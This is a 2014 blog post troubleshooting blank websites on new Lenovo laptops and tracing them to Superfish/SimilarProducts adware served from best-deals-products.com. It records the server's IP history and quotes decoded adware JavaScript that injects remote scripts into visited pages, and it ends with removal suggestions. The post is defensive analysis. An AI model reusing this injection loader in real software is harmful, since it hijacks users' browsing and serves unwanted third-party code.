Tuesday, December 9, 2014

Where does this www.best-deals-products.com malware come from and how to remove it?

Recently I was approached by three to four Internet users who are having problem accessing some internet websites.

The common background/symptoms of their problems?

1) They all have JUST purchased Lenovo PC/Laptop, loaded with latest Windows 8.1 OS.

2) Of course, the device is preloaded with Lenovo stuffs, free AV, in their cases, is McAfee Internet Security, etc...

3) They have no problem browsing most of the websites but some websites would just be blank, or partially blank, or ... just look differently from others machine.

Here comes the troubleshooting steps:

Long story short, the following has been proven that they are not the culprit: Windows 8.1, Internet Explorer 11, Java 8 u25, McAfee Internet Security.

With the chance of able to run a basic HTTP traffic capture on one of the victim's machine, some secret trace of malware has surfaced...


What's this secret visiting to www.best-deals-products.com ???

Google the background of the malware (?), more details revealed:

One of the many faces of the real culprit is possibly one of the below:
http://superfish.com/
They also own this software: SUPERFISH INC VISUAL DISCOVERY




SimilarProducts

This super fish firm has gone through several rounds of funding:
(search crunchbase)

According to records from who.is of Godday, which is the URL host, and also the past records in virus-total.com, this malware server is pointing to some servers in the shared server farm (could be virtual) based in US New Jersey.

Their address keeps moving, today, it's being resolved to IP 66.70.34.103 or 66.70.34.113.

2014-06-19 66.70.34.125
2014-06-11 66.70.34.103
2014-06-11 66.70.34.115
2014-06-03 66.70.34.111
2014-05-29 66.70.34.105
2014-05-25 66.70.34.113
2014-05-02 66.70.34.117
2014-04-17 66.70.34.127
2014-04-14 66.70.34.251
2014-04-09 66.70.34.119
2014-04-08 66.70.34.129
2014-04-06 66.70.34.101

Furthermore, thanks to jsunpack.jeek.org, we can reveal that this malware is targeting Lenovo machine:
http://jsunpack.jeek.org/?report=81918a09b771ebd6691bde5067e5f748decdb46f

One of the decoded files from www.best-deals-products.com/ws/main.jsp?dlsource=hdrykzc
Take note on the highlighted in red part

   if (window == top && !window.similarproducts && navigator.appVersion.toLowerCase().indexOf('msie 7') == -1) {(function(){var windowLocation = location.href.toLowerCase();var nofish = false;var metaTags = document.getElementsByTagName('meta');var metaTag;for (var i=0, l=metaTags.length; i<l; i++){metaTag = metaTags[i];if (metaTag.getAttribute('name') && metaTag.getAttribute('name').toLowerCase() == 'superfish' && metaTag.getAttribute('content') && metaTag.getAttribute('content').toLowerCase() == 'nofish'){nofish = true;break;}}if (windowLocation.search(/\.google\./i) !== -1 && windowLocation.search(/^https?:\/\/(www|play)\.google\.(?!com\/analytics\/)/i) === -1){nofish = true;}//if  (nofish || !(windowLocation.indexOf('.google.') == -1 || windowLocation.indexOf('play.google.com') != -1 || (windowLocation.indexOf('www.google.') != -1 && windowLocation.indexOf('www.google.com/analytics/') == -1)))if  (nofish){return;}window.similarproducts = {}; similarproducts.b = {inj : function( d, url, js, cb) { if (window.location.protocol.indexOf( "https" ) > -1 && url.indexOf( "localhost" ) == -1) {url = url.replace("http:","https:");}else {url = url.replace("https","http");}var h = d.getElementsByTagName('head')[0];var s = d.createElement( js ? "script" : 'link' );if( js ){s.type = "text/javascript";s.src = url;}else{s.rel = "stylesheet";s.href = url;}if(cb){s.onload = ( function( prm ){return function(){cb( prm );}})( url );// IEs.onreadystatechange = ( function( prm ) {return function(){if (this.readyState == 'complete' || this.readyState == 'loaded') {setTimeout( (function(u){return function(){cb( u )}})(prm), 300 );}}})( url );}h.appendChild(s);return s; } };  similarproducts.ver = {ver : "",calcAppVersion: function (){if(this.ver === ""){var CRMLastUpdate = '2014-11-17 10:37:24.555';var globalAppVersion = '14.11.19.1';var globalAppVersionDateParts = globalAppVersion.split('.');var globalAppVersionYear = +globalAppVersionDateParts[0] + 2000;var globalAppVersionMonth = +globalAppVersionDateParts[1] - 1;var globalAppVersionDay = +globalAppVersionDateParts[2];var globalAppVersionHour = +globalAppVersionDateParts[3];if( CRMLastUpdate !== ''){var CRMLastUpdateDateParts = CRMLastUpdate.split('-');var CRMLastUpdateYear = +CRMLastUpdateDateParts[0];var CRMLastUpdateMonth = +CRMLastUpdateDateParts[1] - 1;var CRMLastUpdateDay = +CRMLastUpdateDateParts[2].split(' ')[0];var CRMLastUpdateHour = +CRMLastUpdateDateParts[2].split(' ')[1].split(':')[0];var CRMLastUpdateMin = +CRMLastUpdateDateParts[2].split(' ')[1].split(':')[1];var CRMLastUpdateDate = new Date(CRMLastUpdateYear,CRMLastUpdateMonth,CRMLastUpdateDay,CRMLastUpdateHour,CRMLastUpdateMin,0,0)var globalAppVersionDate = new Date(globalAppVersionYear,globalAppVersionMonth,globalAppVersionDay,globalAppVersionHour,0,0,0)if(CRMLastUpdateDate > globalAppVersionDate){this.ver = [CRMLastUpdateYear,CRMLastUpdateMonth + 1,CRMLastUpdateDay,CRMLastUpdateHour,CRMLastUpdateMin].join('.');} else {this.ver = [globalAppVersionYear,globalAppVersionMonth + 1,globalAppVersionDay,globalAppVersionHour,'1'].join('.');}} else {this.ver = [globalAppVersionYear,globalAppVersionMonth + 1,globalAppVersionDay,globalAppVersionHour,'1'].join('.');}}return this.ver;} };var srcRegex = /\/sf_main\.|\/sf_conduit\.|\/sf_conduit_mam\.|\/sf_conduit_mam_app\.|\/sfw\./i; // Test for script tag src that may contain the app params query stringvar queryStringRegex = /CTID=(CT2680812|CT2652911|CT2659749|CT2695421|CT2666540)/i // Test for "specialsavings" patchvar retryCounter = 1; // Used in the run() function as a fallback condition after 5 attemptsvar timeoutHandle;function extractQueryString(){var queryString = '';var scripts = document.getElementsByTagName('script');var scriptSrc;try{for (var i=0, l=scripts.length; i<l; i++){scriptSrc = scripts[i].src;if (srcRegex.test(scriptSrc)){if (scriptSrc.indexOf('?') != -1){var tempQueryString = scriptSrc.substring(scriptSrc.indexOf('?'));queryString = fixQs(tempQueryString);}break;}}}catch(ex){queryString = '';}return queryString;}function fixQs(initialQS){var fixedQS = '?';initialQS.replace(new RegExp("([^?=&]+)(=([^&]*))?", "g"),function($0, $1, $2, $3){switch ($1){case 'dlsource':$3 = decodeURIComponent($3).replace(/^\s+|\s+$/g,"");break;}fixedQS = fixedQS + $1 + '=' + $3 + '&';});return fixedQS.substring(0, fixedQS.length - 1);}function loadApp(queryString){var appVersion = similarproducts.ver.calcAppVersion();queryString += (queryString == '') ? '?' : '&';queryString += 'ver='+appVersion;if (queryStringRegex.test(queryString)) // Specialsavings patch{if (queryString.indexOf('dlsource=') > -1){queryString = queryString.replace(/dlsource=([^&]*)?/g, 'dlsource=specialsavings_tb');}else{queryString += '&dlsource=specialsavings_tb';}}if (location.protocol === 'https:' && queryString.search(/dlsource=hdrykzc/i) !== -1) // Patch for Lenovo - do not run on https sites{return;}// Assign values to the global similarproducts objectsimilarproducts.b.initialQS = queryString;

In year 2012, someone from fergeek also found that one of the popular chrome extension, fast save, has this infamous malware too:
http://www.fergeeks.com/chrome-tips/fast-save-1-1-chrome-extension-adding-ads-causing-havoc/

Tribalwar (which I suppose is web based game), is affected too.
http://forum.beta.tribalwars2.com/forum/main-category/bug-section/browser-issues/browser-issue-archive/22188-can-t-login-start-the-game

Got a report from stackoverflow user, he/she found this problem on NEWLY BOUGHT LENOVO Y50.
http://stackoverflow.com/questions/27192298/can-not-open-a-particular-web-site-only-javascript-code-is-on-the-screen


Found this link from best-deals-products.com, managed to retrieve the source, anyone can help to read and decipher?
view-source:http://www.best-deals-products.com/ws/userData.jsp?dlsource=mhgqyvl&userid=NTBCNTBC&ver=14.08.21.4





========================================================================
Solution candidates:

Solution 1:
Provided by fixyourbrowser.com
- Remove using AdwCleaner
- Remove using Malwarebyte Anti-Malware

http://www.fixyourbrowser.com/removal-instructions/remove-todays-best-online-deals-ads-removal-guide/

Comment:
You cannot remove it with Malwarebyte Anti-Malware, it fails to detect it.
I am trying the Adwcleaner, will update at here again.

Solution 2:
Provided by teesupport.com
http://blog.teesupport.com/way-to-remove-best-deals-ads-virus-removal/

- Remove some registry entries created by the malware (to be tested)
- Remove it by SpyHunter antivirus (to be tested)